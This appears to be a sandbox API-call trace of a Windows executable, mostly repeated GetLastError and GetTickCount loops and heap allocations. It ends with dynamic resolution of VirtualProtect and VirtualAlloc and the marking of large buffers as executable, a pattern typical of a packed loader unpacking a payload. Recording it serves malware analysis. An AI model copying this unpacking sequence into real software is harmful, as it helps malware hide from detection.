[0147.133] SetLastError (dwErrCode=0x0) [0147.133] GetLastError () returned 0x0 [0147.133] SetLastError (dwErrCode=0x0) [0147.133] GetLastError () returned 0x0 [0147.133] SetLastError (dwErrCode=0x0) [0147.133] GetLastError () returned 0x0 [0147.134] SetLastError (dwErrCode=0x0) [0147.134] GetLastError () returned 0x0 [0147.134] SetLastError (dwErrCode=0x0) [0147.134] GetLastError () returned 0x0 [0147.134] SetLastError (dwErrCode=0x0) [0147.134] GetLastError () returned 0x0 [0147.134] SetLastError (dwErrCode=0x0) [0147.134] GetLastError () returned 0x0 [0147.134] SetLastError (dwErrCode=0x0) [0147.134] GetLastError () returned 0x0 [0147.134] SetLastError (dwErrCode=0x0) [0147.134] GetLastError () returned 0x0 [0147.134] SetLastError (dwErrCode=0x0) [0147.134] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0xe9) returned 0x8719b0 [0147.134] GetLastError () returned 0x0 [0147.134] SetLastError (dwErrCode=0x0) [0147.134] GetLastError () returned 0x0 [0147.134] SetLastError (dwErrCode=0x0) [0147.134] GetLastError () returned 0x0 [0147.134] SetLastError (dwErrCode=0x0) [0147.134] GetLastError () returned 0x0 [0147.134] SetLastError (dwErrCode=0x0) [0147.134] GetLastError () returned 0x0 [0147.134] SetLastError (dwErrCode=0x0) [0147.134] GetLastError () returned 0x0 [0147.135] SetLastError (dwErrCode=0x0) [0147.135] GetLastError () returned 0x0 [0147.135] SetLastError (dwErrCode=0x0) [0147.135] GetLastError () returned 0x0 [0147.135] SetLastError (dwErrCode=0x0) [0147.135] GetLastError () returned 0x0 [0147.135] SetLastError (dwErrCode=0x0) [0147.135] GetLastError () returned 0x0 [0147.135] SetLastError (dwErrCode=0x0) [0147.135] GetLastError () returned 0x0 [0147.135] SetLastError (dwErrCode=0x0) [0147.135] GetLastError () returned 0x0 [0147.135] SetLastError (dwErrCode=0x0) [0147.135] GetLastError () returned 0x0 [0147.135] SetLastError (dwErrCode=0x0) [0147.135] GetLastError () returned 0x0 [0147.135] SetLastError (dwErrCode=0x0) [0147.135] GetLastError () returned 0x0 [0147.135] SetLastError (dwErrCode=0x0) [0147.135] GetLastError () returned 0x0 [0147.135] SetLastError (dwErrCode=0x0) [0147.135] GetLastError () returned 0x0 [0147.135] SetLastError (dwErrCode=0x0) [0147.135] GetLastError () returned 0x0 [0147.136] SetLastError (dwErrCode=0x0) [0147.136] GetLastError () returned 0x0 [0147.136] SetLastError (dwErrCode=0x0) [0147.136] GetLastError () returned 0x0 [0147.136] SetLastError (dwErrCode=0x0) [0147.136] GetLastError () returned 0x0 [0147.136] SetLastError (dwErrCode=0x0) [0147.136] GetLastError () returned 0x0 [0147.136] SetLastError (dwErrCode=0x0) [0147.136] GetLastError () returned 0x0 [0147.136] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x9c) returned 0x871aa8 [0147.136] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x1f) returned 0x871b50 [0147.136] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x36) returned 0x871b78 [0147.136] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x37) returned 0x871bb8 [0147.136] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x3c) returned 0x871bf8 [0147.136] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x31) returned 0x871c40 [0147.136] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x17) returned 0x871c80 [0147.136] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x24) returned 0x871ca0 [0147.136] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x14) returned 0x871cd0 [0147.136] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0xd) returned 0x871cf0 [0147.136] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x25) returned 0x871d08 [0147.136] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x39) returned 0x871d38 [0147.136] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x18) returned 0x871d80 [0147.136] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x17) returned 0x871da0 [0147.136] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0xe) returned 0x871dc0 [0147.136] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x69) returned 0x871dd8 [0147.136] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x3e) returned 0x871e50 [0147.136] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x1b) returned 0x871e98 [0147.136] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x1d) returned 0x871ec0 [0147.136] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x48) returned 0x871ee8 [0147.137] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x12) returned 0x871f38 [0147.137] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x18) returned 0x871f58 [0147.137] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x1b) returned 0x871f78 [0147.137] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x24) returned 0x871fa0 [0147.137] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x29) returned 0x871fd0 [0147.137] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x1e) returned 0x872008 [0147.137] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x41) returned 0x872030 [0147.137] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x17) returned 0x872080 [0147.137] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x14) returned 0x8720a0 [0147.137] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0xf) returned 0x8720c0 [0147.137] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x16) returned 0x8720d8 [0147.137] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x2a) returned 0x8720f8 [0147.137] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x29) returned 0x872130 [0147.137] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x15) returned 0x872168 [0147.137] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x1e) returned 0x872188 [0147.137] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x2a) returned 0x8721b0 [0147.137] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x12) returned 0x8721e8 [0147.137] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x18) returned 0x872208 [0147.137] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x46) returned 0x872228 [0147.137] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8711f8 | out: hHeap=0x870000) returned 1 [0147.137] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x74eb0000 [0147.137] GetProcAddress (hModule=0x74eb0000, lpProcName="IsProcessorFeaturePresent") returned 0x74ec5235 [0147.137] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0147.138] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x80) returned 0x8711f8 [0147.139] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4037ad) returned 0x0 [0147.139] RtlSizeHeap (HeapHandle=0x870000, Flags=0x0, MemoryPointer=0x8711f8) returned 0x80 [0147.139] GetLastError () returned 0x0 [0147.153] lstrlenA (lpString="") returned 0 [0147.153] GetLastError () returned 0x0 [0147.153] GetTickCount () returned 0x113080c [0147.153] GetLastError () returned 0x0 [0147.153] GetTickCount () returned 0x113080c [0147.153] GetLastError () returned 0x0 [0147.153] GetTickCount () returned 0x113080c [0147.153] GetLastError () returned 0x0 [0147.153] GetTickCount () returned 0x113080c [0147.153] GetLastError () returned 0x0 [0147.153] GetTickCount () returned 0x113080c [0147.153] GetLastError () returned 0x0 [0147.153] GetTickCount () returned 0x113080c [0147.153] GetLastError () returned 0x0 [0147.153] GetTickCount () returned 0x113080c [0147.153] GetLastError () returned 0x0 [0147.153] GetTickCount () returned 0x113080c [0147.153] GetLastError () returned 0x0 [0147.153] GetTickCount () returned 0x113080c [0147.153] GetLastError () returned 0x0 [0147.153] GetTickCount () returned 0x113080c [0147.153] GetLastError () returned 0x0 [0147.153] GetTickCount () returned 0x113080c [0147.153] GetLastError () returned 0x0 [0147.153] GetTickCount () returned 0x113080c [0147.153] GetLastError () returned 0x0 [0147.153] GetTickCount () returned 0x113080c [0147.153] GetLastError () returned 0x0 [0147.153] GetTickCount () returned 0x113080c [0147.153] GetLastError () returned 0x0 [0147.153] GetTickCount () returned 0x113080c [0147.153] GetLastError () returned 0x0 [0147.153] GetTickCount () returned 0x113080c [0147.153] GetLastError () returned 0x0 [0147.153] GetTickCount () returned 0x113080c [0147.154] GetLastError () returned 0x0 [0147.154] GetTickCount () returned 0x113080c [0147.154] GetLastError () returned 0x0 [0147.154] GetTickCount () returned 0x113080c [0147.154] GetLastError () returned 0x0 [0147.154] GetTickCount () returned 0x113080c [0147.154] GetLastError () returned 0x0 [0147.154] GetTickCount () returned 0x113080c [0147.154] GetLastError () returned 0x0 [0147.154] GetTickCount () returned 0x113080c [0147.154] GetLastError () returned 0x0 [0147.154] GetTickCount () returned 0x113080c [0147.154] GetLastError () returned 0x0 [0147.154] GetTickCount () returned 0x113080c [0147.154] GetLastError () returned 0x0 [0147.154] GetTickCount () returned 0x113080c [0147.154] GetLastError () returned 0x0 [0147.154] GetTickCount () returned 0x113080c [0147.154] GetLastError () returned 0x0 [0147.154] GetTickCount () returned 0x113080c [0147.154] GetLastError () returned 0x0 [0147.154] GetTickCount () returned 0x113080c [0147.154] GetLastError () returned 0x0 [0147.154] GetTickCount () returned 0x113080c [0147.154] GetLastError () returned 0x0 [0147.154] GetTickCount () returned 0x113080c [0147.154] GetLastError () returned 0x0 [0147.154] GetTickCount () returned 0x113080c [0147.154] GetLastError () returned 0x0 [0147.154] GetTickCount () returned 0x113080c [0147.154] GetLastError () returned 0x0 [0147.154] GetTickCount () returned 0x113080c [0147.154] GetLastError () returned 0x0 [0147.154] GetTickCount () returned 0x113080c [0147.154] GetLastError () returned 0x0 [0147.154] GetTickCount () returned 0x113080c [0147.154] GetLastError () returned 0x0 [0147.154] GetTickCount () returned 0x113080c [0147.154] GetLastError () returned 0x0 [0147.154] GetTickCount () returned 0x113080c [0147.154] GetLastError () returned 0x0 [0147.154] GetTickCount () returned 0x113080c [0147.154] GetLastError () returned 0x0 [0147.154] GetTickCount () returned 0x113080c [0147.155] GetLastError () returned 0x0 [0147.155] GetTickCount () returned 0x113080c [0147.155] GetLastError () returned 0x0 [0147.155] GetTickCount () returned 0x113080c [0147.155] GetLastError () returned 0x0 [0147.155] GetTickCount () returned 0x113080c [0147.155] GetLastError () returned 0x0 [0147.155] GetTickCount () returned 0x113080c [0147.155] GetLastError () returned 0x0 [0147.155] GetTickCount () returned 0x113080c [0147.155] GetLastError () returned 0x0 [0147.155] GetTickCount () returned 0x113080c [0147.155] GetLastError () returned 0x0 [0147.155] GetTickCount () returned 0x113080c [0147.155] GetLastError () returned 0x0 [0147.155] GetTickCount () returned 0x113080c [0147.155] GetLastError () returned 0x0 [0147.155] GetTickCount () returned 0x113080c [0147.155] GetLastError () returned 0x0 [0147.155] GetTickCount () returned 0x113080c [0147.155] GetLastError () returned 0x0 [0147.155] GetTickCount () returned 0x113080c [0147.155] GetLastError () returned 0x0 [0147.155] GetTickCount () returned 0x113080c [0147.155] GetLastError () returned 0x0 [0147.155] GetTickCount () returned 0x113080c [0147.155] GetLastError () returned 0x0 [0147.155] GetTickCount () returned 0x113080c [0147.155] GetLastError () returned 0x0 [0147.155] GetTickCount () returned 0x113080c [0147.155] GetLastError () returned 0x0 [0147.155] GetTickCount () returned 0x113080c [0147.155] GetLastError () returned 0x0 [0147.155] GetTickCount () returned 0x113080c [0147.155] GetLastError () returned 0x0 [0147.155] GetTickCount () returned 0x113081c [0147.165] GetLastError () returned 0x0 [0147.165] GetTickCount () returned 0x113081c [0147.165] GetLastError () returned 0x0 [0147.165] GetTickCount () returned 0x113081c [0147.165] GetLastError () returned 0x0 [0147.165] GetTickCount () returned 0x113081c [0147.165] GetLastError () returned 0x0 [0147.165] GetTickCount () returned 0x113081c [0147.165] GetLastError () returned 0x0 [0147.165] GetTickCount () returned 0x113081c [0147.165] GetLastError () returned 0x0 [0147.165] GetTickCount () returned 0x113081c [0147.165] GetLastError () returned 0x0 [0147.165] GetTickCount () returned 0x113081c [0147.165] GetLastError () returned 0x0 [0147.166] GetTickCount () returned 0x113081c [0147.166] GetLastError () returned 0x0 [0147.166] GetTickCount () returned 0x113081c [0147.166] GetLastError () returned 0x0 [0147.166] GetTickCount () returned 0x113081c [0147.166] GetLastError () returned 0x0 [0147.166] GetTickCount () returned 0x113081c [0147.166] GetLastError () returned 0x0 [0147.166] GetTickCount () returned 0x113081c [0147.166] GetLastError () returned 0x0 [0147.166] GetTickCount () returned 0x113081c [0147.166] GetLastError () returned 0x0 [0147.166] GetTickCount () returned 0x113081c [0147.166] GetLastError () returned 0x0 [0147.166] GetTickCount () returned 0x113081c [0147.166] GetLastError () returned 0x0 [0147.166] GetTickCount () returned 0x113081c [0147.166] GetLastError () returned 0x0 [0147.166] GetTickCount () returned 0x113081c [0147.166] GetLastError () returned 0x0 [0147.166] GetTickCount () returned 0x113081c [0147.166] GetLastError () returned 0x0 [0147.166] GetTickCount () returned 0x113081c [0147.166] GetLastError () returned 0x0 [0147.166] GetTickCount () returned 0x113081c [0147.166] GetLastError () returned 0x0 [0147.166] GetTickCount () returned 0x113081c [0147.166] GetLastError () returned 0x0 [0147.166] GetTickCount () returned 0x113081c [0147.166] GetLastError () returned 0x0 [0147.166] GetTickCount () returned 0x113081c [0147.166] GetLastError () returned 0x0 [0147.166] GetTickCount () returned 0x113081c [0147.166] GetLastError () returned 0x0 [0147.166] GetTickCount () returned 0x113081c [0147.166] GetLastError () returned 0x0 [0147.166] GetTickCount () returned 0x113081c [0147.166] GetLastError () returned 0x0 [0147.166] GetTickCount () returned 0x113081c [0147.166] GetLastError () returned 0x0 [0147.166] GetTickCount () returned 0x113081c [0147.166] GetLastError () returned 0x0 [0147.166] GetTickCount () returned 0x113081c [0147.166] GetLastError () returned 0x0 [0147.166] GetTickCount () returned 0x113081c [0147.167] GetLastError () returned 0x0 [0147.167] GetTickCount () returned 0x113081c [0147.167] GetLastError () returned 0x0 [0147.167] GetTickCount () returned 0x113081c [0147.167] GetLastError () returned 0x0 [0147.167] GetTickCount () returned 0x113081c [0147.167] GetLastError () returned 0x0 [0147.167] GetTickCount () returned 0x113081c [0147.167] GetLastError () returned 0x0 [0147.167] GetTickCount () returned 0x113081c [0147.167] GetLastError () returned 0x0 [0147.167] GetTickCount () returned 0x113081c [0147.167] GetLastError () returned 0x0 [0147.167] GetTickCount () returned 0x113081c [0147.167] GetLastError () returned 0x0 [0147.167] GetTickCount () returned 0x113081c [0147.167] GetLastError () returned 0x0 [0147.167] GetTickCount () returned 0x113081c [0147.167] GetLastError () returned 0x0 [0147.167] GetTickCount () returned 0x113081c [0147.167] GetLastError () returned 0x0 [0147.167] GetTickCount () returned 0x113081c [0147.167] GetLastError () returned 0x0 [0147.167] GetTickCount () returned 0x113081c [0147.167] GetLastError () returned 0x0 [0147.167] GetTickCount () returned 0x113081c [0147.167] GetLastError () returned 0x0 [0147.167] GetTickCount () returned 0x113081c [0147.167] GetLastError () returned 0x0 [0147.167] GetTickCount () returned 0x113081c [0147.167] GetLastError () returned 0x0 [0147.167] GetTickCount () returned 0x113081c [0147.167] GetLastError () returned 0x0 [0147.167] GetTickCount () returned 0x113081c [0147.167] GetLastError () returned 0x0 [0147.167] GetTickCount () returned 0x113081c [0147.167] GetLastError () returned 0x0 [0147.167] GetTickCount () returned 0x113081c [0147.167] GetLastError () returned 0x0 [0147.167] GetTickCount () returned 0x113081c [0147.167] GetLastError () returned 0x0 [0147.167] GetTickCount () returned 0x113081c [0147.167] GetLastError () returned 0x0 [0147.167] GetTickCount () returned 0x113081c [0147.167] GetLastError () returned 0x0 [0147.168] GetTickCount () returned 0x113081c [0147.168] GetLastError () returned 0x0 [0147.168] GetTickCount () returned 0x113081c [0147.168] GetLastError () returned 0x0 [0147.168] GetTickCount () returned 0x113081c [0147.168] GetLastError () returned 0x0 [0147.168] GetTickCount () returned 0x113081c [0147.168] GetLastError () returned 0x0 [0147.168] GetTickCount () returned 0x113081c [0147.168] GetLastError () returned 0x0 [0147.168] GetTickCount () returned 0x113081c [0147.168] GetLastError () returned 0x0 [0147.168] GetTickCount () returned 0x113081c [0147.168] GetLastError () returned 0x0 [0147.168] GetTickCount () returned 0x113081c [0147.168] GetLastError () returned 0x0 [0147.168] GetTickCount () returned 0x113081c [0147.168] GetLastError () returned 0x0 [0147.168] GetTickCount () returned 0x113081c [0147.168] GetLastError () returned 0x0 [0147.168] GetTickCount () returned 0x113081c [0147.168] GetLastError () returned 0x0 [0147.168] GetTickCount () returned 0x113081c [0147.168] GetLastError () returned 0x0 [0147.168] GetTickCount () returned 0x113081c [0147.168] GetLastError () returned 0x0 [0147.168] GetTickCount () returned 0x113081c [0147.168] GetLastError () returned 0x0 [0147.168] GetTickCount () returned 0x113081c [0147.168] GetLastError () returned 0x0 [0147.168] GetTickCount () returned 0x113081c [0147.168] GetLastError () returned 0x0 [0147.168] GetTickCount () returned 0x113081c [0147.168] GetLastError () returned 0x0 [0147.168] GetTickCount () returned 0x113081c [0147.168] GetLastError () returned 0x0 [0147.168] GetTickCount () returned 0x113081c [0147.168] GetLastError () returned 0x0 [0147.168] GetTickCount () returned 0x113081c [0147.168] GetLastError () returned 0x0 [0147.168] GetTickCount () returned 0x113081c [0147.168] GetLastError () returned 0x0 [0147.168] GetTickCount () returned 0x113081c [0147.168] GetLastError () returned 0x0 [0147.168] GetTickCount () returned 0x113081c [0147.169] GetLastError () returned 0x0 [0147.169] GetTickCount () returned 0x113081c [0147.169] GetLastError () returned 0x0 [0147.169] GetTickCount () returned 0x113081c [0147.169] GetLastError () returned 0x0 [0147.169] GetTickCount () returned 0x113081c [0147.169] GetLastError () returned 0x0 [0147.169] GetTickCount () returned 0x113081c [0147.169] GetLastError () returned 0x0 [0147.169] GetTickCount () returned 0x113081c [0147.169] GetLastError () returned 0x0 [0147.169] GetTickCount () returned 0x113081c [0147.169] GetLastError () returned 0x0 [0147.169] GetTickCount () returned 0x113081c [0147.169] GetLastError () returned 0x0 [0147.169] GetTickCount () returned 0x113081c [0147.169] GetLastError () returned 0x0 [0147.169] GetTickCount () returned 0x113081c [0147.169] GetLastError () returned 0x0 [0147.169] GetTickCount () returned 0x113081c [0147.169] GetLastError () returned 0x0 [0147.169] GetTickCount () returned 0x113081c [0147.169] GetLastError () returned 0x0 [0147.169] GetTickCount () returned 0x113081c [0147.169] GetLastError () returned 0x0 [0147.169] GetTickCount () returned 0x113081c [0147.169] GetLastError () returned 0x0 [0147.169] GetTickCount () returned 0x113081c [0147.169] GetLastError () returned 0x0 [0147.169] GetTickCount () returned 0x113081c [0147.169] GetLastError () returned 0x0 [0147.169] GetTickCount () returned 0x113081c [0147.169] GetLastError () returned 0x0 [0147.169] GetTickCount () returned 0x113081c [0147.169] GetLastError () returned 0x0 [0147.169] GetTickCount () returned 0x113081c [0147.169] GetLastError () returned 0x0 [0147.169] GetTickCount () returned 0x113081c [0147.169] GetLastError () returned 0x0 [0147.169] GetTickCount () returned 0x113081c [0147.169] GetLastError () returned 0x0 [0147.169] GetTickCount () returned 0x113081c [0147.169] GetLastError () returned 0x0 [0147.169] GetTickCount () returned 0x113081c [0147.169] GetLastError () returned 0x0 [0147.170] GetTickCount () returned 0x113081c [0147.170] GetLastError () returned 0x0 [0147.170] GetTickCount () returned 0x113081c [0147.170] GetLastError () returned 0x0 [0147.170] GetTickCount () returned 0x113081c [0147.170] GetLastError () returned 0x0 [0147.170] GetTickCount () returned 0x113081c [0147.170] GetLastError () returned 0x0 [0147.170] GetTickCount () returned 0x113081c [0147.170] GetLastError () returned 0x0 [0147.170] GetTickCount () returned 0x113081c [0147.170] GetLastError () returned 0x0 [0147.170] GetTickCount () returned 0x113081c [0147.170] GetLastError () returned 0x0 [0147.170] GetTickCount () returned 0x113081c [0147.170] GetLastError () returned 0x0 [0147.170] GetTickCount () returned 0x113081c [0147.170] GetLastError () returned 0x0 [0147.170] GetTickCount () returned 0x113081c [0147.170] GetLastError () returned 0x0 [0147.170] GetTickCount () returned 0x113081c [0147.170] GetLastError () returned 0x0 [0147.170] GetTickCount () returned 0x113081c [0147.170] GetLastError () returned 0x0 [0147.170] GetTickCount () returned 0x113081c [0147.170] GetLastError () returned 0x0 [0147.170] GetTickCount () returned 0x113081c [0147.170] GetLastError () returned 0x0 [0147.170] GetTickCount () returned 0x113081c [0147.170] GetLastError () returned 0x0 [0147.170] GetTickCount () returned 0x113081c [0147.170] GetLastError () returned 0x0 [0147.170] GetTickCount () returned 0x113081c [0147.170] GetLastError () returned 0x0 [0147.170] GetTickCount () returned 0x113081c [0147.170] GetLastError () returned 0x0 [0147.170] GetTickCount () returned 0x113081c [0147.170] GetLastError () returned 0x0 [0147.170] GetTickCount () returned 0x113081c [0147.170] GetLastError () returned 0x0 [0147.170] GetTickCount () returned 0x113081c [0147.170] GetLastError () returned 0x0 [0147.170] GetTickCount () returned 0x113081c [0147.171] GetLastError () returned 0x0 [0147.171] GetTickCount () returned 0x113081c [0147.171] GetLastError () returned 0x0 [0147.171] GetTickCount () returned 0x113081c [0147.171] GetLastError () returned 0x0 [0147.171] GetTickCount () returned 0x113081c [0147.171] GetLastError () returned 0x0 [0147.171] GetTickCount () returned 0x113081c [0147.171] GetLastError () returned 0x0 [0147.171] GetTickCount () returned 0x113081c [0147.171] GetLastError () returned 0x0 [0147.171] GetTickCount () returned 0x113081c [0147.171] GetLastError () returned 0x0 [0147.171] GetTickCount () returned 0x113081c [0147.171] GetLastError () returned 0x0 [0147.171] GetTickCount () returned 0x113081c [0147.171] GetLastError () returned 0x0 [0147.171] GetTickCount () returned 0x113081c [0147.171] GetLastError () returned 0x0 [0147.171] GetTickCount () returned 0x113082c [0147.171] GetLastError () returned 0x0 [0147.171] GetTickCount () returned 0x113082c [0147.171] GetLastError () returned 0x0 [0147.171] GetTickCount () returned 0x113082c [0147.171] GetLastError () returned 0x0 [0147.171] GetTickCount () returned 0x113082c [0147.171] GetLastError () returned 0x0 [0147.171] GetTickCount () returned 0x113082c [0147.171] GetLastError () returned 0x0 [0147.171] GetTickCount () returned 0x113082c [0147.172] GetLastError () returned 0x0 [0147.172] GetTickCount () returned 0x113082c [0147.172] GetLastError () returned 0x0 [0147.172] GetTickCount () returned 0x113082c [0147.172] GetLastError () returned 0x0 [0147.172] GetTickCount () returned 0x113082c [0147.172] GetLastError () returned 0x0 [0147.172] GetTickCount () returned 0x113082c [0147.172] GetLastError () returned 0x0 [0147.172] GetTickCount () returned 0x113082c [0147.172] GetLastError () returned 0x0 [0147.172] GetTickCount () returned 0x113082c [0147.172] GetLastError () returned 0x0 [0147.172] GetTickCount () returned 0x113082c [0147.172] GetLastError () returned 0x0 [0147.172] GetTickCount () returned 0x113082c [0147.172] GetLastError () returned 0x0 [0147.172] GetTickCount () returned 0x113082c [0147.172] GetLastError () returned 0x0 [0147.172] GetTickCount () returned 0x113082c [0147.172] GetLastError () returned 0x0 [0147.172] GetTickCount () returned 0x113082c [0147.172] GetLastError () returned 0x0 [0147.172] GetTickCount () returned 0x113082c [0147.172] GetLastError () returned 0x0 [0147.172] GetTickCount () returned 0x113082c [0147.172] GetLastError () returned 0x0 [0147.172] GetTickCount () returned 0x113082c [0147.172] GetLastError () returned 0x0 [0147.172] GetTickCount () returned 0x113082c [0147.172] GetLastError () returned 0x0 [0147.172] GetTickCount () returned 0x113082c [0147.172] GetLastError () returned 0x0 [0147.172] GetTickCount () returned 0x113082c [0147.172] GetLastError () returned 0x0 [0147.172] GetTickCount () returned 0x113082c [0147.172] GetLastError () returned 0x0 [0147.172] GetTickCount () returned 0x113082c [0147.172] GetLastError () returned 0x0 [0147.172] GetTickCount () returned 0x113082c [0147.172] GetLastError () returned 0x0 [0147.172] GetTickCount () returned 0x113082c [0147.172] GetLastError () returned 0x0 [0147.172] GetTickCount () returned 0x113082c [0147.172] GetLastError () returned 0x0 [0147.173] GetTickCount () returned 0x113082c [0147.173] GetLastError () returned 0x0 [0147.173] GetTickCount () returned 0x113082c [0147.173] GetLastError () returned 0x0 [0147.173] GetTickCount () returned 0x113082c [0147.173] GetLastError () returned 0x0 [0147.173] GetTickCount () returned 0x113082c [0147.173] GetLastError () returned 0x0 [0147.173] GetTickCount () returned 0x113082c [0147.173] GetLastError () returned 0x0 [0147.173] GetTickCount () returned 0x113082c [0147.173] GetLastError () returned 0x0 [0147.173] GetTickCount () returned 0x113082c [0147.173] GetLastError () returned 0x0 [0147.173] GetTickCount () returned 0x113082c [0147.173] GetLastError () returned 0x0 [0147.173] GetTickCount () returned 0x113082c [0147.173] GetLastError () returned 0x0 [0147.173] GetTickCount () returned 0x113082c [0147.173] GetLastError () returned 0x0 [0147.173] GetTickCount () returned 0x113082c [0147.173] GetLastError () returned 0x0 [0147.173] GetTickCount () returned 0x113082c [0147.173] GetLastError () returned 0x0 [0147.173] GetTickCount () returned 0x113082c [0147.173] GetLastError () returned 0x0 [0147.173] GetTickCount () returned 0x113082c [0147.173] GetLastError () returned 0x0 [0147.173] GetTickCount () returned 0x113082c [0147.173] GetLastError () returned 0x0 [0147.173] GetTickCount () returned 0x113082c [0147.173] GetLastError () returned 0x0 [0147.173] GetTickCount () returned 0x113082c [0147.173] GetLastError () returned 0x0 [0147.173] GetTickCount () returned 0x113082c [0147.173] GetLastError () returned 0x0 [0147.173] GetTickCount () returned 0x113082c [0147.173] GetLastError () returned 0x0 [0147.173] GetTickCount () returned 0x113082c [0147.173] GetLastError () returned 0x0 [0147.173] GetTickCount () returned 0x113082c [0147.173] GetLastError () returned 0x0 [0147.173] GetTickCount () returned 0x113082c [0147.173] GetLastError () returned 0x0 [0147.174] GetTickCount () returned 0x113082c [0147.174] GetLastError () returned 0x0 [0147.174] GetTickCount () returned 0x113082c [0147.174] GetLastError () returned 0x0 [0147.174] GetTickCount () returned 0x113082c [0147.174] GetLastError () returned 0x0 [0147.174] GetTickCount () returned 0x113082c [0147.174] GetLastError () returned 0x0 [0147.174] GetTickCount () returned 0x113082c [0147.174] GetLastError () returned 0x0 [0147.174] GetTickCount () returned 0x113082c [0147.174] GetLastError () returned 0x0 [0147.174] GetTickCount () returned 0x113082c [0147.174] GetLastError () returned 0x0 [0147.174] GetTickCount () returned 0x113082c [0147.174] GetLastError () returned 0x0 [0147.174] GetTickCount () returned 0x113082c [0147.174] GetLastError () returned 0x0 [0147.174] GetTickCount () returned 0x113082c [0147.174] GetLastError () returned 0x0 [0147.174] GetTickCount () returned 0x113082c [0147.174] GetLastError () returned 0x0 [0147.174] GetTickCount () returned 0x113082c [0147.174] GetLastError () returned 0x0 [0147.174] GetTickCount () returned 0x113082c [0147.174] GetLastError () returned 0x0 [0147.174] GetTickCount () returned 0x113082c [0148.110] lstrcatA (in: lpString1="", lpString2="kernel32.dll" | out: lpString1="kernel32.dll") returned="kernel32.dll" [0148.114] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74eb0000 [0148.117] LocalAlloc (uFlags=0x0, uBytes=0x90e4b) returned 0x5b0020 [0148.118] GetProcAddress (hModule=0x74eb0000, lpProcName="VirtualProtect") returned 0x74ec435f [0148.186] VirtualProtect (in: lpAddress=0x5b0020, dwSize=0x90e4b, flNewProtect=0x40, lpflOldProtect=0x18f1f0 | out: lpflOldProtect=0x18f1f0*=0x4) returned 1 [0148.259] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x74eb0000 [0148.259] GetProcAddress (hModule=0x74eb0000, lpProcName="GlobalAlloc") returned 0x74ec588e [0148.260] GetProcAddress (hModule=0x74eb0000, lpProcName="GetLastError") returned 0x74ec11c0 [0148.260] GetProcAddress (hModule=0x74eb0000, lpProcName="Sleep") returned 0x74ec10ff [0148.260] GetProcAddress (hModule=0x74eb0000, lpProcName="VirtualAlloc") returned 0x74ec1856 [0148.260] GetProcAddress (hModule=0x74eb0000, lpProcName="CreateToolhelp32Snapshot") returned 0x74ee735f [0148.260] GetProcAddress (hModule=0x74eb0000, lpProcName="Module32First") returned 0x74f45cd9 [0148.260] GetProcAddress (hModule=0x74eb0000, lpProcName="CloseHandle") returned 0x74ec1410 [0148.260] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x44 [0148.262] Module32First (hSnapshot=0x44, lpme=0x18f840) returned 1 [0148.265] VirtualAlloc (lpAddress=0x0, dwSize=0x119e50, flAllocationType=0x1000, flProtect=0x40) returned 0x710000 [0148.543] GetProcAddress (hModule=0x74eb0000, lpProcName="LoadLibraryA") returned 0x74ec49d7 [0148.543] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x74eb0000 [0148.543] GetProcAddress (hModule=0x74eb0000, lpProcName="VirtualAlloc") returned 0x74ec1856 [0148.543] GetProcAddress (hModule=0x74eb0000, lpProcName="VirtualProtect") returned 0x74ec435f [0148.543] GetProcAddress (hModule=0x74eb0000, lpProcName="VirtualFree") returned 0x74ec186e [0148.543] GetProcAddress (hModule=0x74eb0000, lpProcName="GetVersionExA") returned 0x74ec3519 